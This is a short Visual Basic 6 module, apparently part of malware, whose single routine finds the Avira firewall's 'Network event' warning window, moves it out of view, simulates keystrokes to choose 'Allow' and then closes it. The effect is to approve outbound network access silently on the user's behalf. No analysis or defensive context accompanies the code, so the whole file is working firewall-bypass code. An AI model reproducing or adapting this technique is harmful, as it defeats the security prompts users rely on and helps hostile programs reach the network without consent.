Attribute VB_Name = "Avirita"
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Sub mAviraFwb()
lngHandle = FindWindow(vbNullString, "Network event")
If (lngHandle <> 0) Then
    lngStartButton = FindWindowEx(lngHandle, 0, "", "&Allow")
    SetWindowPos lngHandle, 0, 0, 0, 0, 0, 2
    AppActivate ("Network event")
    SendKeys "{left}"
    SendKeys "{enter}"
    WireClose = PostMessage(lngHandle, &H10, 0&, 0&)
End If
End Sub


